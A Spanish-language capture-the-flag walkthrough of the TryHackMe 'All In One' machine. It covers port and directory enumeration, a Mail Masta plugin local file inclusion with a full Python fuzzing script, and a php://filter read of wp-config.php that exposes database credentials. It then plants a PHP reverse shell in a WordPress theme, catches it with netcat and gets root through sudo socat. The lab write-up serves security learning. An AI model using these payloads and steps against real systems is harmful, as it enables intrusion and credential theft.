> For the complete documentation index, see [llms.txt](https://enciall.gitbook.io/enciall/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://enciall.gitbook.io/enciall/ctf/try-hack-me/all-in-one.md).

# All In One

### Iniciamos con un escaneo rápido para identificar los puertos abiertos: &#x20;

```bash
nmap -p- -sS -sV -sC --open --min-rate 5000 -vvv -n -Pn -oN scan.txt ip
```

```bash
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 60 vsftpd 3.0.5
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
|   FTP server status:
|      Connected to ::ffff:10.2.18.141
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 60 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 96:7f:0c:59:db:10:e4:c8:8d:be:7b:58:7b:5a:05:0a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/Y75p1JJVBf7bDMBwF5+lQ4QqUPlglyqWlIpnaN/NBNa3Wg27OlMzqrvKPJIq4DfXAtaCOlzBODEgQLVjbJSE2w2/veoIR1F9B26sgpaTd9o0SkvIpVv8X+DEzRM4PEVh5/Q/
| FabYv+PcrfnT07jSpBnu5gwgejXDvbQPeHey/zYHn1n8GSXEXuFkmeehZWlNpIWJLiN7jEesXKhMsTyu+AyZmO6EC3j+TJ7eecq/ZeiibnS4F39gThz3aie9KeE0IMhDWNzht1IY8nraxHLr+OyFAfcircdmCST7xneKn3Ij/dEmwP
| BQes+WulScRZmF3akaLplvj1JrCGgxvKuFUVkj7H8evJvnoEWj2L1xlFJq70qj24KhkIZxvTXZ03LfvRl9OXUbTZF8lTr+3jHOwjGpcA1mx2LYgScHzYNc7E9acwRyQ1IitkyuLlFOyQFkHN8yWpYuFyRg28ip6KxKf6GJyrwOzDJZ
| VAFPFnmCNOLUCo+5g2hU2fwKyi2qNPE=
|   256 fb:41:38:1d:ab:a2:cb:82:92:dc:01:55:71:0f:b8:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPJ8kI+3eeuZu91lmD4MiabOn2S8CKiJ13vYHzA5wj7V/8QWfsAuP2lZ81Aw7fm+F1r73WkAADR4xFdStBTYqlE=
|   256 0d:8b:b2:3f:a2:44:71:bc:f8:88:a8:69:72:70:e9:33 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMruip6fRl5rcwPjRC4Gp5jMl5JCYlnlo3p9DjJtpi0U
80/tcp open  http    syn-ack ttl 60 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

```

vemos que tenemos 3 puertos abiertos si vamos a el puerto 80(HTTP) vemos la pagina por defecto de apache asi que toca hacer fuzzing:

```bash
ffuf -u http://ip/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```

```

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.201.99.54/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

wordpress               [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 124ms]
hackathons              [Status: 200, Size: 197, Words: 19, Lines: 64, Duration: 235ms]
```

vemos que tenemos dos directorios un "**wordpress**" y un "**hackathons**" vamos a el wordpress y encontramos una pagina

<figure><img src="/files/tsHKK6ecdtHvGDvELLPd" alt=""><figcaption></figcaption></figure>

vemos que esta hecho con wordpress asi que usaremos WPScan para intentar conseguir alguna vulnerabilidad de esta web

```bash
wpscan --url http://10.201.121.26/wordpress/ -e ap u
```

con este comando enumeraremos los plugins (ap) y los usuarios (u)

```bash
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.201.121.26/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.201.121.26/wordpress/wp-content/plugins/mail-masta/readme.txt
 
 [i] User(s) Identified:

[+] elyana
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.201.121.26/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
```

vemos que tenemos un plugin llamado mail-masta que es un plugin vulnerable&#x20;

```bash
searchsploit mail masta
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                       |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion                                                                                               | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)                                                                                           | php/webapps/50226.py
WordPress Plugin Mail Masta 1.0 - SQL Injection                                                                                                      | php/webapps/41438.txt
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
```

tenesmos tres formas de explotar este plugin&#x20;

LFI: <https://www.exploit-db.com/exploits/40290>&#x20;

nos explica que es vulnerable a Local File Inclusion ejecutando esto en la url

```
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
```

modificando `pl=/etc/passwd` por cualquier archivo del sistema o tenemos otra alternativa usar un script que nos facilita buscar archivos y verificar si funciona&#x20;

LFI 2: <https://www.exploit-db.com/exploits/50226>

es script es antiguo asi que necesitaremos modificar un poco el codigo para que funcione en python3

codigo corregido

```
# Exploit Title: WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
# Date: 2021-08-24
# Exploit Author: Matheus Alexandre [Xcatolin]
# Software Link: https://downloads.wordpress.org/plugin/mail-masta.zip
# Version: 1.0

#WordPress Plugin Mail Masta is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.

#* Make sure to modify the wordlist path to your preferred wordlist. You can also download the one i used at Github: 
#https://github.com/Xcatolin/Personal-Exploits/

#!/usr/bin/python

# Exploit for the Wordpress plugin mail-masta 1.0 LFI vulnerability

import requests
from requests.exceptions import ConnectionError

class bcolors:
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    ITALIC   = '\33[3m'

print(bcolors.BOLD + """\
                 __  __      _ _     __  __         _                  
                |  \/  |__ _(_) |___|  \/  |__ _ __| |_ __ _           
                | |\/| / _` | | |___| |\/| / _` (_-<  _/ _` |          
                |_|  |_\__,_|_|_|   |_|  |_\__,_/__/\__\__,_|          
  _                 _   ___ _ _       ___         _         _          
 | |   ___  __ __ _| | | __(_) |___  |_ _|_ _  __| |_  _ __(_)___ _ _  
 | |__/ _ \/ _/ _` | | | _|| | / -_)  | || ' \/ _| | || (_-< / _ \ ' \ 
 |____\___/\__\__,_|_| |_| |_|_\___| |___|_||_\__|_|\_,_/__/_\___/_||_|

                                        
                    |_   .  \_/ _ _ |_ _ |. _  
                    |_)\/.  / \(_(_||_(_)||| ) 
                       /                       
     """ + bcolors.ENDC)

endpoint = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl="
valid = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"


print (bcolors.WARNING + "[+] Insert the target including the WordPress instance:" + bcolors.ENDC)
print (bcolors.ITALIC + "ex: http://target.com/wordpress\n" + bcolors.ENDC)
target = input("~# ")

print (bcolors.WARNING + "[*] Checking if the target is alive..." + bcolors.ENDC)
try:
    request = requests.get(target)
except ConnectionError:
    print (bcolors.FAIL + "[X] Target not available. Please check the URL you've entered." + bcolors.ENDC)
    exit(1)
else:
    print (bcolors.OKGREEN + "[!] Target up and running!\n" + bcolors.ENDC)

print (bcolors.WARNING + "[*] Checking if the Mail-Masta endpoint is vulnerable..." + bcolors.ENDC)
try:
    response = requests.get(target + valid)
except len(response.content) < 1000 :
    print (bcolors.FAIL + "[X] Endpoint not vulnerable." + bcolors.ENDC)
    exit(1)
else:
    print (bcolors.OKGREEN + "[!] Endpoint vulnerable!\n" + bcolors.ENDC)

print (bcolors.WARNING + "[*] Fuzzing for files in the system..." + bcolors.ENDC)
wordlist='/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt' ## Change here
lines=open(wordlist, "r").readlines()

for i in range(0, len(lines)):
    word=lines[i].replace("\n","")
    response = requests.get(target + endpoint + word)
    if len(response.content) > 500 :
        print(f"{bcolors.OKGREEN}[!] {bcolors.ENDC} File {word} found!")
           
```

para ejecutarlo cambia `wordlist='/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt'` cambia esto por la wordlist de tu preferencia pero si usas kali linux o cualquier distro de ciberseguridad debería de funcionar&#x20;

en resumen no encontré nada interesante ejecutando el script pero si buscamos el archivo de configuracion de de wordpress podemos usar base64 para que no se ejecute el archivo y nos permita leerlo

```
http://ip/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php
```

nos dara el codigo del archivo codificado ahora toco decodificarlo:

```
PD9waHANCi8qKg0KICogVGhlIGJhc2UgY29uZmlndXJhdGlvbiBmb3IgV29yZFByZXNzDQogKg0KICogVGhlIHdwLWNvbmZpZy5waHAgY3JlYXRpb24gc2NyaXB0IHVzZXMgdGhpcyBmaWxlIGR1cmluZyB0aGUNCiAqIGluc3RhbGxhdGlvbi4gWW91IGRvbid0IGhhdmUgdG8gdXNlIHRoZSB3ZWIgc2l0ZSwgeW91IGNhbg0KICogY29weSB0aGlzIGZpbGUgdG8gIndwLWNvbmZpZy5waHAiIGFuZCBmaWxsIGluIHRoZSB2YWx1ZXMuDQogKg0KICogVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBmb2xsb3dpbmcgY29uZmlndXJhdGlvbnM6DQogKg0KICogKiBNeVNRTCBzZXR0aW5ncw0KICogKiBTZWNyZXQga2V5cw0KICogKiBEYXRhYmFzZSB0YWJsZSBwcmVmaXgNCiAqICogQUJTUEFUSA0KICoNCiAqIEBsaW5rIGh0dHBzOi8vd29yZHByZXNzLm9yZy9zdXBwb3J0L2FydGljbGUvZWRpdGluZy13cC1jb25maWctcGhwLw0KICoNCiAqIEBwYWNrYWdlIFdvcmRQcmVzcw0KICovDQoNCi8vICoqIE15U1FMIHNldHRpbmdzIC0gWW91IGNhbiBnZXQgdGhpcyBpbmZvIGZyb20geW91ciB3ZWIgaG9zdCAqKiAvLw0KLyoqIFRoZSBuYW1lIG9mIHRoZSBkYXRhYmFzZSBmb3IgV29yZFByZXNzICovDQpkZWZpbmUoICdEQl9OQU1FJywgJ3dvcmRwcmVzcycgKTsNCg0KLyoqIE15U1FMIGRhdGFiYXNlIHVzZXJuYW1lICovDQpkZWZpbmUoICdEQl9VU0VSJywgJ2VseWFuYScgKTsNCg0KLyoqIE15U1FMIGRhdGFiYXNlIHBhc3N3b3JkICovDQpkZWZpbmUoICdEQl9QQVNTV09SRCcsICdIQGNrbWVAMTIzJyApOw0KDQovKiogTXlTUUwgaG9zdG5hbWUgKi8NCmRlZmluZSggJ0RCX0hPU1QnLCAnbG9jYWxob3N0JyApOw0KDQovKiogRGF0YWJhc2UgQ2hhcnNldCB0byB1c2UgaW4gY3JlYXRpbmcgZGF0YWJhc2UgdGFibGVzLiAqLw0KZGVmaW5lKCAnREJfQ0hBUlNFVCcsICd1dGY4bWI0JyApOw0KDQovKiogVGhlIERhdGFiYXNlIENvbGxhdGUgdHlwZS4gRG9uJ3QgY2hhbmdlIHRoaXMgaWYgaW4gZG91YnQuICovDQpkZWZpbmUoICdEQl9DT0xMQVRFJywgJycgKTsNCg0Kd29yZHByZXNzOw0KZGVmaW5lKCAnV1BfU0lURVVSTCcsICdodHRwOi8vJyAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLicvd29yZHByZXNzJyk7DQpkZWZpbmUoICdXUF9IT01FJywgJ2h0dHA6Ly8nIC4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJy93b3JkcHJlc3MnKTsNCg0KLyoqI0ArDQogKiBBdXRoZW50aWNhdGlvbiBVbmlxdWUgS2V5cyBhbmQgU2FsdHMuDQogKg0KICogQ2hhbmdlIHRoZXNlIHRvIGRpZmZlcmVudCB1bmlxdWUgcGhyYXNlcyENCiAqIFlvdSBjYW4gZ2VuZXJhdGUgdGhlc2UgdXNpbmcgdGhlIHtAbGluayBodHRwczovL2FwaS53b3JkcHJlc3Mub3JnL3NlY3JldC1rZXkvMS4xL3NhbHQvIFdvcmRQcmVzcy5vcmcgc2VjcmV0LWtleSBzZXJ2aWNlfQ0KICogWW91IGNhbiBjaGFuZ2UgdGhlc2UgYXQgYW55IHBvaW50IGluIHRpbWUgdG8gaW52YWxpZGF0ZSBhbGwgZXhpc3RpbmcgY29va2llcy4gVGhpcyB3aWxsIGZvcmNlIGFsbCB1c2VycyB0byBoYXZlIHRvIGxvZyBpbiBhZ2Fpbi4NCiAqDQogKiBAc2luY2UgMi42LjANCiAqLw0KZGVmaW5lKCAnQVVUSF9LRVknLCAgICAgICAgICd6a1klbSVSRlliOnUsL2xxLWlafjhmakVOZElhU2I9Xms8M1pyLzBEaUxacVB4enxBdXFsaTZsWi05RFJhZ0pQJyApOw0KZGVmaW5lKCAnU0VDVVJFX0FVVEhfS0VZJywgICdpQVlhazxfJn52OW8re2JAUlBSNjJSOSBUeS0gNlUteUg1YmFVRHs7bmRTaUNbXXFvc3hTQHNjdSZTKWQkSFtUJyApOw0KZGVmaW5lKCAnTE9HR0VEX0lOX0tFWScsICAgICdhUGRfKnNCZj1adWMrK2FdNVZnOT1QfnUwM1EsenZwW2VVZS99KUQ9Ok55aFVZe0tYUl10N300MlVwa1tyNz9zJyApOw0KZGVmaW5lKCAnTk9OQ0VfS0VZJywgICAgICAgICdAaTtUKHt4Vi9mdkUhcyteZGU3ZTRMWDN9TlRAIGo7YjRbejNfZkZKYmJXKG5vIDNPN0ZAc3gwIW95KE9gaCNNJyApOw0KZGVmaW5lKCAnQVVUSF9TQUxUJywgICAgICAgICdCIEFUQGk
```

```
echo "codigo-codificado" | base64 --decode
```

en el codigo vemos algo interesante

```
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'elyana' );

/** MySQL database password */
define( 'DB_PASSWORD', 'H@ckme@123' );
```

elyana y lo que parece ser la contraseña asi que probemosla en el panel de inicio de sesion de wordpress en el directorio wp-admin probándola vemos que funciona ahora estando dentro tratemos de ejecutar una web-shell en Apperance/theme editor en el archivo functions.php&#x20;

<figure><img src="/files/ODmxSvn3aJGnCQRAR7J4" alt=""><figcaption></figcaption></figure>

usaremos la reverse shell de <https://www.revshells.com/>&#x20;

modificamos ip y selecionamos PHP PentestMonkey copiamos todo el codigo y lo ponemos en el archivo de la web

<figure><img src="/files/U9SA9TLGTPjzsWymxfHN" alt=""><figcaption></figcaption></figure>

nos ponemos en escucha con netcat&#x20;

```
nc -lvnp 2344
```

y le damos a update file en la web ahora deberiamos de tenre una reverse-shell&#x20;

arreglamos la tty operativa

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

vamos al directorio de elyana ne /home/elyana encontramos dos archivos de texto uno no lo podemos leer pero el otro si

```
cat hint.txt
Elyana's user password is hidden in the system. Find it ;)
```

nos dice que la contraseña de elyana esta oculta en el sistema asi que busquemos archivos que el usuario pueda abrir

```
find / -user elyana 2>/dev/null 
/home/elyana
/home/elyana/.local
/home/elyana/.local/share
/home/elyana/.cache
/home/elyana/user.txt
/home/elyana/.gnupg
/home/elyana/.bash_logout
/home/elyana/hint.txt
/home/elyana/.bash_history
/home/elyana/.profile
/home/elyana/.sudo_as_admin_successful
/home/elyana/.bashrc
/etc/mysql/conf.d/private.txt
```

buscando encontramos un archivo raro /etc/mysql/conf.d/private.txt si lo abrimos vemos la contraseña vemos la contraseña de elyana

```
cat /etc/mysql/conf.d/private.txt
user: elyana
password: E@syR18ght
```

accedemos en ssh

```
ssh elyana@10.201.81.16 
```

si hacemos sudo -l para ver que puede ejecutar el usuario con permisos de root y vemos lo siguiente

```
elyana@ip-10-201-81-16:~$ sudo -l
Matching Defaults entries for elyana on ip-10-201-81-16:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on ip-10-201-81-16:
    (ALL) NOPASSWD: /usr/bin/socat
```

vemos que podemos ejecutar como root sin contraseña el binario socat y si buscamos en <https://gtfobins.github.io/> vemos que podemos elevar privilegios con eso

```
elyana@ip-10-201-81-16:~$ sudo socat stdin exec:/bin/sh
whoami
root
```
